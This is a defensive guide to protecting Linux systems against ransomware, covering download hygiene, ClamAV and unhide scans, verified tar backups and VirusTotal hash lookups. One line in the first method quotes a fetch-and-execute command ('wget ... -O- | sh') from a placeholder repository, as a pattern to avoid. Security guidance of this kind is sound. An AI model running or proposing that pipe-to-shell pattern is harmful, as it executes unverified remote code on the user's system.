Ransomware is one of the more serious threats in network security today. The idea that someone could hold your data hostage is frightening: some ransomware encrypts every file on a volume, and the people behind it demand payment before they will release the key needed to decrypt it. It is especially worrying for anyone with a great deal of money invested in their data. There is a small bit of good news for Linux users, however.
In most situations it is difficult for ransomware to gain control of anything beyond what the compromised user account can write, which usually means that user's home directory. Running as an unprivileged user, it lacks the permissions to trash an entire install. That is why Linux ransomware is more of a problem on servers, where operators routinely work as root and where a web application's service account may own the data that matters. Bear in mind that the home directory is where most of a user's valuable files live, so user-level access is still enough to do real damage. Ransomware should not be a major issue for ordinary Linux users, and there are several steps you can take to keep it from happening to you.
Method 1: Defending Against BashCrypt-style Attacks
BashCrypt is a proof-of-concept piece of ransomware that showed it is possible to infect server infrastructure with this kind of malicious code, and it provides a baseline for what Linux ransomware packages might look like. While such packages are currently uncommon, the same common-sense precautions that server administrators take on other platforms work just as well here. The difficulty is that in enterprise environments a large number of different people may be using a single host.
If you are running a mail server, it can be very hard to keep people from doing foolish things. Remind everyone not to open attachments they are not sure about, and scan anything questionable for malware. Another thing that really helps is paying attention to how you install binaries with wget. A mail server probably has no desktop environment at all, so you likely use wget alongside apt-get, yum or pacman to bring packages onto it. Watch which repositories those installations pull from. Sometimes you will see a command that asks you to execute something like wget http://www.thisisaprettybadcoderepo.webs/ -O- | sh, either typed at the prompt or buried inside a shell script. Piping a download straight into sh executes whatever the remote server happens to send, with no chance to inspect it and no copy left on disk to examine afterwards. Either way, do not run it if you do not know what that repository is and who maintains it. Download the script to a file, read it, and compare its checksum or signature with what the project publishes before executing it.
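The safe replacement for "wget URL -O- | sh", as an added example that is not code from the original article: save the download, compare its SHA-256 with the value the project publishes out of band, and only then execute it. The URL in the comment is a hypothetical placeholder, and the demo runs against a constructed local script rather than a real download; it assumes GNU coreutils sha256sum.

```shell
#!/bin/sh
# Added example (not from the original article). Download to disk, verify the
# digest against a value obtained out of band, then run. Never pipe to sh.

# Prints the hex SHA-256 of a file (assumes coreutils sha256sum).
sha256_of() {
    sha256sum "$1" | cut -d' ' -f1
}

# Usage: verify_and_run <script> <expected-sha256>
# Executes the script only on an exact digest match; otherwise returns 1
# without running anything.
verify_and_run() {
    script="$1"
    expected="$2"
    actual=$(sha256_of "$script") || return 1
    if [ "$actual" != "$expected" ]; then
        printf 'refusing to run %s: digest %s does not match expected %s\n' \
            "$script" "$actual" "$expected" >&2
        return 1
    fi
    sh "$script"
}

# Real-world flow (the URL is a placeholder, not a real repository):
#   wget -O install.sh 'https://example.invalid/install.sh'
#   less install.sh          # read what it does before anything else
#   verify_and_run install.sh <sha256 taken from the project's release page>

# Self-contained demonstration on a constructed script.
demo() {
    tmp=$(mktemp)
    printf 'echo "installer ran"\n' > "$tmp"
    # Matching digest: the script executes.
    verify_and_run "$tmp" "$(sha256_of "$tmp")"
    # Wrong digest (as after tampering in transit): nothing executes.
    verify_and_run "$tmp" "deadbeef" || echo "tampered copy rejected"
    rm -f "$tmp"
}

demo
```

A checksum only proves you got the file the publisher meant to send; if the project signs its releases, verify the signature with gpg as well, since an attacker who can replace the script on the server can usually replace a checksum file hosted beside it.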
Method 2: Installing a Scanner Package
Several open source malware scanners exist. ClamAV is by far the best known, and on apt-based distributions you can install it with:
sudo apt-get install clamav
Once it is installed, run freshclam to download the current signature database (scanning with no signatures finds nothing), then see man clamscan for usage; clamscan can walk a directory tree recursively. Keep in mind that while it can detect infected files and delete or move them aside, it cannot strip the malicious code out of a file and leave the rest intact. It is all or nothing.
There is a second scanner you might not be familiar with, and it is useful if hidden processes are what worry you: a rootkit that conceals the malware's process from ps and the /proc listing. Again, on an apt-based distribution, install the unhide scanner with:
sudo apt-get install unhide
Once it is installed, run:
sudo unhide sys
This checks for processes that are hidden from the usual tools by comparing the process list that ps reports against what the kernel reveals through other interfaces; a process that shows up in one view but not the other is flagged. Expect an occasional false positive from short-lived processes that start or exit during the scan, so repeat the scan before acting on a result.
Method 4: Keeping Clean Backups on Hand
This should not even need saying, since everyone should always make backups, but good backups instantly take the teeth out of ransomware. What little ransomware exists for Linux tends to target files with extensions specific to web development platforms. If you have a lot of .php, .xml or .js code sitting around, you will specifically want to back it up. Consider the following command:
find . \( -name '*.rb' -o -name '*.html' \) -print0 | tar --null -cf backups.tar -T -
This creates a tar archive of every file with the .rb or .html extension under the current directory. Passing the names with -print0 and --null keeps file names containing spaces intact, which the simpler $(find ...) substitution does not. Extract the archive into a temporary directory afterwards to confirm it was created correctly.
The archive can and should be moved to an external volume. You can compress it with gzip (.gz), bzip2 (.bz2) or xz (.xz) before doing so, and it is worth keeping mirrored backups by copying it to two different volumes. Keep at least one copy offline or read-only: a backup that stays mounted and writable is just another set of files that ransomware running under your account can encrypt.
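A fuller version of that backup step, as an added example and not code from the original article: it archives the web-development extensions the section names, records a SHA-256 digest beside the archive, and verifies the archive (digest plus a trial extraction) so that the copy on the external volume can be checked before it is ever needed. It assumes GNU tar and coreutils sha256sum; the source and destination directories are whatever you pass in.

```shell
#!/bin/sh
# Added example (not from the original article). Assumes GNU tar and
# coreutils sha256sum, as found on most Linux distributions.

# Usage: backup_sources <source-dir> <dest-dir>
# Archives *.php *.js *.xml *.html *.rb below <source-dir> into a timestamped
# .tar.gz in <dest-dir>, stores its SHA-256 next to it, prints the archive
# path. Returns 1 on any failure.
backup_sources() {
    src="$1"
    mkdir -p "$2" || return 1
    dest=$(cd "$2" && pwd) || return 1
    archive="$dest/src-$(date -u +%Y%m%dT%H%M%SZ).tar.gz"
    # -print0 / --null carry names with spaces or newlines safely into tar,
    # which a $(find ...) substitution cannot.
    ( cd "$src" && find . -type f \( -name '*.php' -o -name '*.js' \
        -o -name '*.xml' -o -name '*.html' -o -name '*.rb' \) -print0 \
        | tar --null -czf "$archive" -T - ) || return 1
    # Digest file uses the bare archive name so it verifies from any mount
    # point after the copy to external media.
    ( cd "$dest" && sha256sum "$(basename "$archive")" > "$archive.sha256" ) \
        || return 1
    printf '%s\n' "$archive"
}

# Usage: verify_backup <archive>
# Re-checks the recorded digest, then does a trial extraction into a scratch
# directory. Run it on the copy that lives on the external volume, not only
# the original, so corruption or tampering of that copy is caught early.
verify_backup() {
    archive="$1"
    dir=$(dirname "$archive")
    ( cd "$dir" && sha256sum -c --quiet "$(basename "$archive").sha256" ) \
        || return 1
    scratch=$(mktemp -d) || return 1
    rc=0
    tar -xzf "$archive" -C "$scratch" >/dev/null 2>&1 || rc=1
    rm -rf "$scratch"
    return "$rc"
}
```

The digest file is what makes the copy on the external volume trustworthy: after rsync or cp to the second volume, run verify_backup on that copy, and keep the .sha256 file somewhere the backup volume cannot overwrite it so that a tampered archive cannot arrive with a matching tampered digest.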
Method 5: Using Web-based Scanners
Perhaps you have downloaded an RPM or DEB package from a site that promises useful software. Software is also distributed as 7z or compressed tar archives, and mobile users may receive Android packages in APK format. It is easy to scan these with a tool right in your browser. Point it at https://www.virustotal.com/gui/ and, once the page loads, click the "Choose File" button. Before you upload, keep in mind that this is a public service. It is legitimate and run by Google (part of Alphabet Inc), but anything you submit is shared with the participating antivirus vendors and other VirusTotal customers, which makes it unsuitable for confidential files or anything internal to your organisation. It also limits upload size; at the time of writing the limit was 128 MB.
Select your file in the dialog that appears and click Open. The file name appears next to the button once the dialog closes.
Click the large blue "Scan it!" button. Another box indicates that your file is being uploaded.
If the file has already been submitted, VirusTotal shows the existing report instead of scanning again. It recognises the file by its SHA-256 digest, the same value the sha256sum command computes on Linux, so you can hash a file locally and search for the digest before deciding whether to upload it at all. If there is no prior report, it runs the file through several dozen engines (53 at the time of writing). A few may time out on a given file; those results can safely be ignored.
Different engines may disagree, and that is what makes the system useful for weeding out false positives: a single detection among dozens of clean verdicts is usually a false alarm, while agreement across many vendors is a strong signal. The best part is that it works across platforms, so it is equally useful whichever distribution runs on your various devices. It works just as well from Android, which is why it is a good way to inspect APK packages before installing them.
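The hash-first lookup described above, as an added example that is not code from the original article: compute the SHA-256 locally and build the report URL, so an existing verdict can be read without the file ever leaving the machine. The URL form https://www.virustotal.com/gui/file/<sha256> is VirusTotal's public report address; the sample file in the demo is constructed, and the script assumes coreutils sha256sum.

```shell
#!/bin/sh
# Added example (not from the original article). Look a file up on
# VirusTotal by digest before deciding whether to upload it at all.

# Usage: file_sha256 <file>: prints the hex digest the report is keyed on.
file_sha256() {
    sha256sum "$1" | cut -d' ' -f1
}

# Usage: vt_report_url <file>
# Prints the VirusTotal report URL for the file's SHA-256. Open it first;
# only if no report exists do you need to decide whether the file is
# something you are willing to share with every participating vendor.
vt_report_url() {
    digest=$(file_sha256 "$1") || return 1
    printf 'https://www.virustotal.com/gui/file/%s\n' "$digest"
}

# Usage: vt_report_urls <dir>
# One "name  URL" line per package in a download directory, so a batch of
# .deb/.rpm/.apk/.tar.*/.7z files can be checked without uploading any.
vt_report_urls() {
    for f in "$1"/*.deb "$1"/*.rpm "$1"/*.apk "$1"/*.tar.* "$1"/*.7z; do
        [ -e "$f" ] || continue
        printf '%s  ' "$(basename "$f")"
        vt_report_url "$f"
    done
}

# Demo on a constructed file: the digest of "hello\n" is well known, so the
# resulting URL can be checked by hand.
demo() {
    d=$(mktemp -d)
    printf 'hello\n' > "$d/sample.deb"
    vt_report_urls "$d"
    rm -rf "$d"
}

demo
```

A report found this way tells you what the engines said about that exact byte sequence; a repackaged or re-signed build will have a different digest and no report, which is itself a useful hint that the file is not the one the vendor ships.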